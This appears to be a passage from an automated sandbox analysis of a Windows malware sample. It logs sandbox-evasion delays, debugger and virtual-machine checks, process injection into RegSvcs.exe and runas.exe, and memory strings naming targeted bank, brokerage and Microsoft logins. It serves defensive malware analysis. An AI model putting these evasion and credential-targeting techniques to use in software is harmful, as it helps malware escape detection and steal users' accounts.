                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exe; Memory allocated: 85A0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exe; Memory allocated: 95A0000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exe; Memory allocated: E10000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exe; Memory allocated: 2AB0000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exe; Memory allocated: FA0000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exe; Memory allocated: 70C0000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exe; Memory allocated: 80C0000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exe; Memory allocated: 8250000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exe; Memory allocated: 9250000 memory reserve | memory write watch
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 7_2_014D096E rdtsc 7_2_014D096E
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exe; Thread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Thread delayed: delay time: 922337203685477 (2 identical entries)
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exe; Thread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Window / User API: threadDelayed 8621
                Source: C:\Windows\SysWOW64\runas.exe; Window / User API: threadDelayed 9839
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; API coverage: 0.7 %
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; API coverage: 0.3 %
                Source: C:\Windows\SysWOW64\runas.exe; API coverage: 2.6 %
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exe TID: 64; Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5960; Thread sleep time: -1844674407370954s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1804; Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exe TID: 5276; Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\runas.exe TID: 2436; Thread sleep count: 133 > 30
                Source: C:\Windows\SysWOW64\runas.exe TID: 2436; Thread sleep time: -266000s >= -30000s
                Source: C:\Windows\SysWOW64\runas.exe TID: 2436; Thread sleep count: 9839 > 30
                Source: C:\Windows\SysWOW64\runas.exe TID: 2436; Thread sleep time: -19678000s >= -30000s
                Source: C:\Program Files (x86)\iHCptkpThbKfqchulqsPQhxaPCNUHfdWasVPvuhWFDLcDNWQcDvXwYmBxtLWlGYJrhjKyPhgqV\hAtMBptzWt.exe TID: 4068; Thread sleep time: -30000s >= -30000s
                Source: C:\Windows\System32\conhost.exe; Last function: Thread delayed (2 identical entries)
                Source: C:\Windows\SysWOW64\runas.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\runas.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\runas.exeCode function: 17_2_023BC330 FindFirstFileW,FindNextFileW,FindClose,17_2_023BC330
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Roaming\GDhinOc.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: 023115.17.dr Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
                Source: runas.exe, 00000011.00000002.3360122455.00000000078A8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: tVMware20,11696487552
                Source: runas.exe, 00000011.00000002.3360122455.00000000078A8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ms.portal.azure.comVMware20,116964875,
                Source: 023115.17.dr Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
                Source: 023115.17.dr Binary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
                Source: 023115.17.dr Binary or memory string: discord.comVMware20,11696487552f
                Source: 023115.17.dr Binary or memory string: bankofamerica.comVMware20,11696487552x
                Source: 023115.17.dr Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
                Source: nK1Y86mbzfbkwpB.exe, 00000000.00000002.2184155901.0000000007461000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                Source: 023115.17.dr Binary or memory string: ms.portal.azure.comVMware20,11696487552
                Source: 023115.17.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
                Source: 023115.17.dr Binary or memory string: tasks.office.comVMware20,11696487552o
                Source: 023115.17.dr Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
                Source: 023115.17.dr Binary or memory string: global block list test formVMware20,11696487552
                Source: runas.exe, 00000011.00000002.3352619446.0000000002807000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll,
                Source: runas.exe, 00000011.00000002.3360122455.00000000078A8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: .comVMware20,116964875523
                Source: runas.exe, 00000011.00000002.3360122455.00000000078A8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552J
                Source: 023115.17.dr Binary or memory string: AMC password management pageVMware20,11696487552
                Source: 023115.17.dr Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
                Source: hAtMBptzWt.exe, 00000016.00000002.3355415751.00000000009B9000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2942583225.000001BDD664C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: 023115.17.dr Binary or memory string: interactivebrokers.comVMware20,11696487552
                Source: 023115.17.dr Binary or memory string: dev.azure.comVMware20,11696487552j
                Source: 023115.17.dr Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
                Source: runas.exe, 00000011.00000002.3360122455.00000000078A8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMware20,11696487552}
                Source: 023115.17.dr Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
                Source: nK1Y86mbzfbkwpB.exe, 00000000.00000002.2184155901.0000000007461000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                Source: 023115.17.dr Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
                Source: runas.exe, 00000011.00000002.3360122455.00000000078A8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: formVMware20,11696487552
                Source: runas.exe, 00000011.00000002.3360122455.00000000078A8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11[
                Source: 023115.17.dr Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
                Source: 023115.17.dr Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
                Source: 023115.17.dr Binary or memory string: outlook.office365.comVMware20,11696487552t
                Source: 023115.17.dr Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
                Source: 023115.17.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
                Source: 023115.17.dr Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
                Source: 023115.17.dr Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
                Source: runas.exe, 00000011.00000002.3360122455.00000000078A8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: secure.bankofamerica.comVMwareI
                Source: 023115.17.dr Binary or memory string: outlook.office.comVMware20,11696487552s
                Source: runas.exe, 00000011.00000002.3360122455.00000000078A8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: rdVMware20,11696487552x
                Source: 023115.17.dr Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
                Source: 023115.17.dr Binary or memory string: turbotax.intuit.comVMware20,11696487552t
                Source: 023115.17.dr Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
                Source: runas.exe, 00000011.00000002.3360122455.00000000078A8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: kofamerica.comVMware20,11696487552x
                Source: 023115.17.dr Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
                Source: runas.exe, 00000011.00000002.3360122455.00000000078A8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.co.inVMware20,1169648x
                Source: 023115.17.dr Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
                Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exe Process information queried: ProcessInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process queried: DebugPort
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process queried: DebugPort
                Source: C:\Windows\SysWOW64\runas.exe Process queried: DebugPort
                Source: C:\Windows\SysWOW64\runas.exe Process queried: DebugPort
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_014D096E rdtsc
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_00417953 LdrLoadDll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01528158 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01524144 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01524144 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01524144 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01524144 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01524144 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01496154 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01496154 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0148C156 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01564164 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01564164 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01550115 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0153A118 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0153A118 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0153A118 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0153A118 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0153E10E mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0153E10E mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0153E10E mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0153E10E mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0153E10E mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0153E10E mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0153E10E mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0153E10E mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0153E10E mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0153E10E mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_014C0124 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0150E1D0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0150E1D0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0150E1D0 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0150E1D0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0150E1D0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_015561C3 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_015561C3 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_015661E5 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_014C01F8 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_014D0185 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0151019F mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0151019F mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0151019F mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0151019F mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01534180 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01534180 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0154C188 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0154C188 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0148A197 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0148A197 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0148A197 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01516050 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01492050 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_014BC073 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01514000 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01532000 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01532000 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01532000 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01532000 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01532000 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01532000 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01532000 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01532000 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_014AE016 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_014AE016 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_014AE016 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_014AE016 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01526030 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0148A020 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0148C020 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_015120DE mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_014980E9 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0148A0E3 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_015160E0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0148C0F0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_014D20F0 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0149208A mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_014880A0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_015560B8 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_015560B8 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_015280A8 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01538350 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0155A352 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0151035C mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0151035C mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0151035C mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0151035C mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0151035C mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0151035C mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01512349 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01512349 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01512349 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01512349 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01512349 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01512349 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01512349 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01512349 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01512349 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01512349 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01512349 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01512349 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01512349 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01512349 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01512349 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0156634F mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0153437C mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_014CA30B mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_014CA30B mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_014CA30B mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0148C310 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_014B0310 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01568324 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01568324 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01568324 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01568324 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_015343D4 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_015343D4 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0153E3DB mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0153E3DB mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0153E3DB mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0153E3DB mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0149A3C0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0149A3C0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0149A3C0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0149A3C0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0149A3C0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0149A3C0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_014983C0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_014983C0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_014983C0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_014983C0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_015163C0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0154C3CD mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_014A03E9 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_014A03E9 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_014A03E9 mov eax, dword ptr fs:[00000030h]
